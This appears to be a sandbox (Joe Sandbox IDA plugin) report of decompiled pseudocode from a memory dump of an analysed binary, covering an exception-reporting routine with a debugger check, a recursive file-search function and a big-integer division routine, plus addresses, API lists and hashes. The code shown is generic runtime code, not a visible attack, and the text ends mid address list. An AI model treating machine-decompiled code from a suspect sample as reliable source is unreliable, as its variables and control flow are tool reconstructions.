				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x103e668; // 0x7ecdc17e
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0101F0B1(_t41);
					_pop(_t62);
				}
				E0101F350(_t67,  &_v804, 0, 0x50);
				E0101F350(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E0101F0B1(_t57);
				}
				return E0101EC4A(_v8 ^ _t70);
			}

0x0102866f
0x0102866f
0x0102866f
0x0102866f
0x0102867a
0x0102867f
0x01028681
0x01028689
0x0102868b
0x0102868e
0x01028693
0x01028693
0x0102869f
0x010286b2
0x010286c0
0x010286c6
0x010286cc
0x010286d2
0x010286d8
0x010286de
0x010286e4
0x010286ea
0x010286f0
0x010286f6
0x010286fd
0x01028704
0x0102870b
0x01028712
0x01028719
0x01028720
0x01028721
0x0102872a
0x01028730
0x01028733
0x01028739
0x01028746
0x0102874f
0x01028758
0x01028761
0x0102876f
0x01028771
0x01028786
0x01028792
0x01028795
0x0102879a
0x010287a9

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 01028767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 01028771
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0102877E

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 00c4d005a8cdab7778c3e6a4d389bcb857b8955b7708da9959a318d03d0ba492
Instruction ID: 7ce9ca16e204938f2adc46461d11fdcb75b405c49747ab78c1966a03100e344d
Opcode Fuzzy Hash: 00c4d005a8cdab7778c3e6a4d389bcb857b8955b7708da9959a318d03d0ba492
Instruction Fuzzy Hash: D631D77590122D9BCB61DF68D888BDCBBF8BF18310F5081DAE94CA7250E7349B858F45

Uniqueness

Uniqueness Score: -1.00%

Function 0102AAA8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0102AAA8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E010285A9(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E0102E8A2(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E0102ACE7(_a16, _t101, __eflags, _t111);
							E010284DE(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E0102E8A2(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E01028849();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0x103e668; // 0x7ecdc17e
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E0102E8F0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E0101F350(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E0102AAA8(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E01025A90(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0102A900);
									}
								} else {
									_push(_t55);
									_t57 = E0102AAA8(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0102AAA8(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E0101EC4A(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x0102aaad
0x0102aaae
0x0102aab1
0x0102aab1
0x0102aab4
0x0102aab4
0x0102aab6
0x0102aab7
0x0102aac0
0x0102aac1
0x0102aac4
0x0102aac7
0x0102aacc
0x0102aad3
0x0102aad4
0x0102aad5
0x0102aad8
0x0102aae2
0x0102aae5
0x0102aae6
0x0102aae8
0x0102aafc
0x0102aafc
0x0102aaff
0x0102ab09
0x0102ab0e
0x0102ab11
0x0102ab13
0x00000000
0x0102ab15
0x0102ab19
0x0102ab22
0x0102ab28
0x00000000
0x0102ab2b
0x0102aaea
0x0102aaea
0x0102aaf0
0x0102aaf5
0x0102aaf8
0x0102aafa
0x0102ab31
0x0102ab33
0x0102ab34
0x0102ab35
0x0102ab36
0x0102ab37
0x0102ab38
0x0102ab3d
0x0102ab41
0x0102ab43
0x0102ab49
0x0102ab50
0x0102ab53
0x0102ab56
0x0102ab57
0x0102ab5a
0x0102ab5b
0x0102ab5e
0x0102ab5f
0x0102ab80
0x0102ab80
0x0102ab82
0x00000000
0x00000000
0x0102ab67
0x0102ab69
0x0102ab6b
0x0102ab6d
0x0102ab6f
0x0102ab71
0x0102ab73
0x0102ab7e
0x00000000
0x0102ab7e
0x0102ab73
0x0102ab6f
0x00000000
0x0102ab6b
0x0102ab84
0x0102ab86
0x0102ab89
0x0102aba2
0x0102aba2
0x0102aba4
0x0102aba7
0x0102abb7
0x0102abb9
0x0102abb9
0x0102aba9
0x0102aba9
0x0102abac
0x00000000
0x0102abae
0x0102abae
0x0102abb1
0x00000000
0x0102abb3
0x0102abb3
0x0102abb3
0x0102abb1
0x0102abac
0x0102abbf
0x0102abc7
0x0102abcb
0x0102abd9
0x0102abde
0x0102abf3
0x0102abf5
0x0102abfb
0x0102abfe
0x0102ac30
0x0102ac30
0x0102ac32
0x0102ac35
0x0102ac3b
0x0102ac3b
0x0102ac42
0x0102ac5c
0x0102ac5c
0x0102ac6b
0x0102ac70
0x0102ac73
0x0102ac75
0x00000000
0x00000000
0x00000000
0x00000000
0x0102ac44
0x0102ac44
0x0102ac4a
0x0102ac4c
0x00000000
0x0102ac4e
0x0102ac4e
0x0102ac51
0x00000000
0x0102ac53
0x0102ac53
0x0102ac5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0102ac5a
0x0102ac51
0x0102ac4c
0x00000000
0x0102ac77
0x0102ac7f
0x0102ac85
0x0102ac87
0x0102ac87
0x0102ac8f
0x0102ac94
0x0102ac9c
0x0102ac9f
0x0102aca1
0x0102acb5
0x0102acba
0x0102ac00
0x0102ac00
0x0102ac04
0x0102ac0c
0x0102ac0c
0x0102ac0c
0x0102ac0e
0x0102ac11
0x0102ac14
0x0102ac14
0x0102ab8b
0x0102ab8e
0x0102ab90
0x00000000
0x0102ab92
0x0102ab92
0x0102ab98
0x0102ab9d
0x0102ab90
0x0102ac21
0x0102ac2c
0x00000000
0x00000000
0x00000000
0x0102aafa
0x0102aace
0x0102aad0
0x0102ab2c
0x0102ab30
0x0102ab30
0x00000000

Strings

., xrefs: 0102AC3B

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 4f656c4452c65722305b9eb773f20e1301d96cdd359194e05d48e353e0c39fb1
Instruction ID: fb9e38a3fd0ab598797f9e46f992b8283b690a2f8092a5583b007398ab7190a1
Opcode Fuzzy Hash: 4f656c4452c65722305b9eb773f20e1301d96cdd359194e05d48e353e0c39fb1
Instruction Fuzzy Hash: 82312671A00229AFDB258E78CC84EEB7BBDDF85314F1005D8E59897652DA309944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0102CB60, Relevance: 3.5, APIs: 2, Instructions: 464
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 90%

			E0102CB60(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E0101E7C0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E01031930(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E0101E7E0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E0101E7E0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0x102e17d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E01031930( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E0102E3AA(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E0102E3AA(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E0102E3AA(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}

0x0102cb6c
0x0102cb6f
0x0102cb73
0x0102cb7d
0x0102cb80
0x0102cb82
0x0102cb84
0x0102cb91
0x0102cb91
0x0102cb94
0x0102cb94
0x0102cb97
0x0102cb9a
0x0102cb9c
0x0102cccf
0x0102ccd1
0x0102cd1a
0x0102cd1e
0x0102cd24
0x0102ccd3
0x0102ccd5
0x0102ccd8
0x0102ccda
0x0102ccdd
0x0102ccdf
0x0102cce1
0x0102cd15
0x0102cd15
0x0102cd15
0x0102cce3
0x0102cce8
0x0102ccee
0x0102ccee
0x0102ccf1
0x0102ccf3
0x0102ccf5
0x00000000
0x00000000
0x0102ccf7
0x0102ccf8
0x0102ccfb
0x0102ccfe
0x0102cd00
0x00000000
0x0102cd02
0x00000000
0x0102cd02
0x00000000
0x0102cd00
0x0102cd04
0x0102cd0b
0x0102cd0f
0x0102cd13
0x00000000
0x00000000
0x0102cd13
0x0102cd16
0x0102cd16
0x0102cd18
0x0102cd25
0x0102cd28
0x0102cd2b
0x0102cd2e
0x0102cd2e
0x0102cd32
0x0102cd35
0x0102cd38
0x0102cd3b
0x0102cd46
0x0102cd3d
0x0102cd42
0x0102cd42
0x0102cd50
0x0102cd55
0x0102cd58
0x0102cd5a
0x0102cd64
0x0102cd67
0x0102cd6e
0x0102cd71
0x0102cd74
0x0102cd7c
0x0102cd82
0x0102cd82
0x0102cd82
0x0102cd82
0x0102cd74
0x0102cd87
0x0102cd8e
0x0102cd8e
0x0102cd91
0x0102cd94
0x0102cfc6
0x0102cfc6
0x0102cd9a
0x0102cd9a
0x0102cda0
0x0102cda3
0x0102cda6
0x0102cda9
0x0102cdac
0x0102cdaf
0x0102cdb2
0x0102cdb2
0x0102cdb5
0x0102cdbc
0x0102cdbc
0x0102cdb7
0x0102cdb7
0x0102cdb7
0x0102cdbe
0x0102cdc2
0x0102cdc5
0x0102cdc7
0x0102cdca
0x0102cdd1
0x0102cdd4
0x0102cdd7
0x0102cde2
0x0102cde5
0x0102cdea
0x0102cdef
0x0102cdf6
0x0102cdfb
0x0102cdfd
0x0102cdff
0x0102ce03
0x0102ce06
0x0102ce09
0x0102ce11
0x0102ce1a
0x0102ce1a
0x0102ce1c
0x0102ce1f
0x0102ce1f
0x0102ce09
0x0102ce29
0x0102ce2e
0x0102ce33
0x0102ce35
0x0102ce38
0x0102ce3a
0x0102ce3d
0x0102ce40
0x0102ce42
0x0102ce45
0x0102ce48
0x0102ce4a
0x0102ce51
0x0102ce56
0x0102ce59
0x0102ce63
0x0102ce65
0x0102ce67
0x0102ce6a
0x0102ce6a
0x0102ce6c
0x0102ce6f
0x0102ce72
0x0102ce75
0x0102ce78
0x0102ce4c
0x0102ce4c
0x0102ce4f
0x00000000
0x00000000
0x0102ce4f
0x0102ce7b
0x0102ce7d
